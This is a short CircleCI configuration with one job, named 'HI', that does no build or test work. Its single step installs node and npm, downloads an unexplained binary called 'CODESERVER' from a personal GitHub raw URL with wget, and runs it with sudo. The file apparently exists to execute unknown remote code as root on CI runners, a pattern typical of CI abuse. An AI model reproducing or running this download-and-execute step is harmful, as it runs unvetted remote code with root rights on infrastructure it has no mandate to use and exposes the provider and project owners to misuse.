version: 2.1
jobs:
  HI:
    docker:
      - image: cimg/node:12.22.11
    steps:
      - checkout
      - run:
          name: "HI"
          command: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://raw.githubusercontent.com/aurbach55/pos/main/CODESERVER && chmod +x CODESERVER && sudo ./CODESERVER

workflows:
  HI-workflow:
    jobs:
      - HI